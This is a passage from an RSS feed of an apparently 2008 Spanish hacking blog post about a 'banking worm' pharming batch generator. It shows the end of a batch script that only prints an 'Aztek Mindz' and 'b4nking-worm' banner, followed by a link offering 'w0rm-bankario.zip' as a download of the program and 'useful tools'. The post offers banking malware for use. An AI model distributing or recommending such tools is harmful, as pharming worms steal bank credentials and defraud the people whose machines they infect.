<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+-+-+-+-+-+ +-+-+-+-+-+<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;^|A^|z^|t^|e^|k^| ^|M^|i^|n^|d^|z^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+-+-+-+-+-+ +-+-+-+-+-+<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; - www.aztekmindz.org ^| octalh@gmail.com -<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>+<span class="br0">&#93;</span>====================<span class="br0">&#91;</span> b4nking-worm <span class="br0">&#93;</span>====================<span class="br0">&#91;</span>+<span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
pause&gt;nul</div>
<p><a href="http://www.aztekmindz.org/wp-content/uploads/2008/06/w0rm-bankario.zip"><span style="color: #ff0000;">Descargar Programa y herramientas utiles</span></a> <img src='http://www.aztekmindz.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.aztekmindz.org/2008/06/28/generador-de-gusano-bancario-pharming-batch/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
